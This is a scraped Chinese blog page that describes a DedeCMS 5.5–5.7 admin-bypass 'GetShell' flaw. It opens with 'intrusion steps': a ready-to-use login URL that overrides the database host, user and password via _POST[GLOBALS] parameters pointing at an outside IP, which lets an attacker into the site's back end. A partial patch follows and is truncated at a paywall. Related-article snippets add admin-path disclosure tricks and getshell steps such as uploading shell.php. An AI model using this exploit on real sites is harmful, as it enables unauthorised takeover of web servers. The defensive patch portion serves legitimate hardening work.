mysql5.5.57 漏洞_DEDECMS(织梦程序)5.5-5.7通杀GetShell漏洞

最新推荐文章于 2024-04-07 16:20:44 发布
最新推荐文章于 2024-04-07 16:20:44 发布
阅读量843 收藏 1
点赞数
文章标签: mysql5.5.57 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42118161/article/details/114340110
版权

入侵步骤如下:http://www.oday.pw/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

把上面validate后面的字母改为当前的验证码,即可直接进入网站后台。

小编分析了一下,此漏洞的前提是必须得到后台路径才能实现,因此大家一定要养成使用DEDECM建站时改后台名字的习惯。下面给出官方的解决办法:

解决办法:

找到include/common.inc.php文件,把

foreach($_REQUEST as $_k=>$_v)

{

var_dump($_k);

if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) ):

{

exit('Request var not allow!');

}

}

换成

//检查和注册外部提交的变量

function CheckRequest(&$val) {

if (is_array($val)) {

foreach ($val as $_k=>$_v) {

最低0.47元/天 解锁文章
看不见的天边
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
dedecms爆后台文件技巧
cc1988429的专栏
10-12 1734
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理 员帐号,新版本的就直接转向了后台. 2.include/dialog/config.php会爆出后台管理路径 3.include/dialog/select_soft.php?activepath=/include/FCKeditor
mysql5.5.57 漏洞_Oracle MySQL 5.5和5.6正受到Riddle漏洞影响,请立即更新到5.7!丨附下载...
weixin_29611239的博客
02-05 327
流行的数据库管理系统(DBMS)Oracle MySQL中发现了被称为“The Riddle”的编码漏洞,该漏洞允许攻击者利用MiTM(man-in-the-middle,中间人)来窃取用户的用户名和密码等登录凭证。用户请立即更新到5.7版本。中间人攻击(MiTM)MiTM 攻击(Man-in-the-MiddleAttack)是一种“间接”的入侵攻击,这种攻击模式是通过各种技术手段将受入侵者控...
CVE-2023-2928 DedeCMS 文件包含漏洞getshell 漏洞分析
shelter1234567的博客
04-07 783
这样的话一般的利用方式就不行了,好在cms没用禁用掉文件包含的逻辑,我们可以利用/admin/allowurl.txt 这个文件,实现文件包含任意代码执行。可以将用户输入的字符保存到/admin/allowurl.txt ,因为有stripslashes函数的过滤xss无效。file_manage_control.php 页面为用户提供了网站文件管理的功能,访问file_manage_control.php 利用文件包含构造1.php。尝试在php中或txt中添加php执行代码结果被检测了。
dedecms进入mysql后台_织梦dedecms使用Mysql8.0无法登录后台的解决办法
weixin_39809584的博客
02-15 180
这篇文章主要为大家详细介绍了织梦dedecms使用Mysql8.0无法登录后台的解决办法,具有一定的参考价值,感兴趣的小伙伴们可以参考一下,有需要的朋友可以收藏方便以后借鉴。今天一个客户联系我们的技术,反馈说安装之后,但是登录后台,一直提示用户名不存在。通常这个原因有两个(1、数据库链接信息不对 2、数据库表中的用户名不是默认的admin,被修改过)经过多发查证,这两个原因都被排除了,最后发现原...
dedecms-v5.7-sp1远程文件包含getshell
What_Happened的博客
12-13 6246
前段时间自己搭了个dedecms-v5.7-sp1的靶机来练手,偶然在网上发现了一篇靠谱的文章,讲的是dedecms的一个远程文件包含getshell的方法,理解了以后决定自己再写出来,以加深印象~ 利用条件:首先,是目标站安装完cms后并没有删除install文件夹,漏洞文件为\install\index.php.bak 。       其次,目标站点的Apache存在文件解
Oracle MySQL 5.5和5.6正受到Riddle漏洞影响,请立即更新到5.7!丨附下载
weixin_34195364的博客
04-20 227
2019独角兽企业重金招聘Python工程师标准>>> ...
DB01_数据库mysql5.5-5.7.33使用教程.doc
06-19
软件下载、安装、配置、使用
mysql-5.7.36-linux-glibc2.12-x86_64.tar.gz
11-04
mysql-5.7.36-linux-glibc2.12-x86_64.tar.gz
Centos7安装MySQL5.5-5.7.docx
最新发布
04-15
Centos7安装MySQL5.5-5.7.docx
mysql-5.7.34-1.el7.x86_64.rpm-bundle.zip
07-19
zip包里是官网下载下来的.tar文件
audit-plugin-mysql-5.7-1.1.11-985-linux-x86_64
04-09
mysql 5.7社区版安全审计插件 audit-plugin-mys mysql5.7社区版安全审计 安全审计插件 mysql审计插件 审计插件
Dedecms 5.7 SP2后台getshell
一个安全研究员
07-02 9801
前言 最近也打算研究研究各大cms的漏洞了,正好看到一篇关于dedecms后台getshell的文章,所以也自己动手复现一下,这样以后遇到了也更容易上手。该漏洞涉及的版本是dedecms的最新版吧,下载地址: http://www.dedecms.com/products/dedecms/downloads/ 复现 版本: 我这里测试的是utf8版,这个版本应该不影响。 漏洞位...
解决DEDECMS历史难题–找后台目录
夜班机器人的博客
03-02 6404
仅针对windows系统 附原文地址:https://xz.aliyun.com/t/2064 附原理文档 poc: <?php $domain='http://localhost/dedecms/'; $url=$domain.'/index.php'; function post($url, $data, $cookie = '') { $options = array...
dedecms 找后台总结_dedecms系统后台查找技巧分析
weixin_42298382的博客
02-23 645
这篇文章主要为大家介绍了dedecms系统后台查找技巧分析,可通过访问的报错信息找到后台访问地址,对于dedecms建站的安全来说具有重要的参考价值,需要的朋友可以参考下本文较为详细的分析了dedecms系统后台查找技巧。分享给大家供大家参考。具体分析如下:有时在通过注射得到织梦程序的管理密码时,却发现找不到后台地址,这样让大家很是蛋疼,下面我来介绍几种织梦系统找后台的方法.这个时候大家可以尝试下...
dede 5.7 爆后台
weixin_30532759的博客
07-13 477
#!/usr/bin/env python import requests import itertools characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#" back_dir = "" flag = 0 url = "http://www.rensheng5.com/tags.php" data = { ...
dedecms 5.7 任意前台用户修改漏洞
浅笑996的博客
12-10 1330
一、 启动环境 1.双击运行桌面phpstudy.exe软件 2.点击启动按钮,启动服务器环境 二、代码审计 1.双击启动桌面Seay源代码审计系统软件 2.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\ dedecms v57),点击确定 漏洞分析 1.进入member/resetpassword.php页面,将鼠标滚动到页面第75行 else if($dopost =...
dedecms V5.7 SP2 web后台getshell
公众号shadow sock7
11-12 5178
https://www.freebuf.com/vuls/164035.html dede/tpl.php任意文件写入漏洞。 条件:已登录后台。 首先访问/dede/tpl.php?action=upload获取token值 访问/dede/tpl.php?filename=&amp;amp;amp;amp;amp;lt;yourname&amp;amp;amp;amp;amp;gt;.lib.php&amp;amp;amp;amp;amp;amp;action=savetagf
mysql注入漏洞手注
一个码农的笔记
09-29 6093
mysql: 报错注入: 以http://www.hexie.com/main/articleDetail.php?id=757 为例子: http://www.hexie.com/main/articleDetail.php?id=757' 报错 方法一:(1)http://www.hexie.com/main/articleDetail.php ?id=757' and (sel
120.网络安全渗透测试—[CMS后台 getwebshell]—[织梦dedecms5.7后台 getwebshell]
qwsn
07-10 2731
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! (1)进入后台:模块–>文件管理器---->上传文件---->shell.php,内容为 (2)访问:\shell.php(1)进入后台:模块–>文件管理器–>新建文件–>写入wshell.php,内容为 (2)访问:\wshell.php (3)访问:\shell0.php (1)进入后台:系统–>系统基本参数–>核心配置–>专题最大的节点数或FTP端口写入 (2)访问:data\config.cache.inc.php....
怎样删除mysql-community-libs-compat-5.7.40-1.el7.x86_64 mysql-community-libs-5.7.41-1.el7.x86_64 mysql-community-common-5.7.40-1.el7.x86_64
04-15
sudo yum remove mysql-community-libs-compat-5.7.40-1.el7.x86_64 mysql-community-libs-5.7.41-1.el7.x86_64 mysql-community-common-5.7.40-1.el7.x86_64 请注意,这将从您的系统中完全删除这些包,包括它们的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值